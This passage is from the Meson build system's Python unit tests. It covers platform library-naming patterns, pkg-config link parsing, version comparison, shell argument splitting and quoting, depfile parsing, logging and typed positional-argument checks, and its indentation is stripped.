self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.options[OptionKey('link_args', lang='c')] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[-1] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[-1] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[-1] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
            # line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(sorted(deps), sorted(expdeps))
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
env.scratch_dir = tmpdir
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
        errors = []  # type: T.List[T.Tuple[Path, Exception]]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
def test_typed_pos_args_types(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], int)
self.assertIsInstance(args[2], bool)
_(None, mock.Mock(), ['string', 1, False], None)
def test_typed_pos_args_types_invalid(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1.0, False], None)
self.assertEqual(str(cm.exception), 'foo argument 2 was of type "float" but should have been "int"')
def test_typed_pos_args_types_wrong_number(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 2.')
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1, True, True], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 4.')
def test_typed_pos_args_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_varargs_not_given(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertEqual(args[1], [])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_varargs_invalid(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been "str"')
    def test_typed_pos_args_varargs_invalid_multiple_types(self) -> None:
@typed_pos_args('foo', str, varargs=(str, list))
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been one of: "str", "list"')
def test_typed_pos_args_max_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=5)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=1)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args'], None)
self.assertEqual(str(cm.exception), 'foo takes between 1 and 2 arguments, but got 3.')
def test_typed_pos_args_min_varargs(self) -> None:
@typed_pos_args('foo', varargs=str, max_varargs=2, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], list)
self.assertIsInstance(args[0][0], str)
self.assertIsInstance(args[0][1], str)
_(None, mock.Mock(), ['string', 'var'], None)
def test_typed_pos_args_min_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_and_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 'bar'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 4.')
def test_typed_pos_args_min_and_max_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 1.')
def test_typed_pos_args_variadic_and_optional(self) -> None:
@typed_pos_args('foo', str, optargs=[str], varargs=str, min_varargs=0)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(AssertionError) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(
str(cm.exception),
'varargs and optargs not supported together as this would be ambiguous')
def test_typed_pos_args_min_optargs_not_met(self) -> None:
@typed_pos_args('foo', str, str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_optargs_max_exceeded(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', '1', '2'], None)
self.assertEqual(str(cm.exception), 'foo takes at most 2 arguments, but got 3.')
def test_typed_pos_args_optargs_not_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsNone(args[1])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_optargs_some_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str, int])
def _(obj, node, args: T.Tuple[str, T.Optional[str], T.Optional[int]], kwargs) -> None:
self.assertEqual(len(args), 3)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
self.assertEqual(args[1], '1')
self.assertIsNone(args[2])
_(None, mock.Mock(), ['string', '1'], None)
def test_typed_pos_args_optargs_all_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
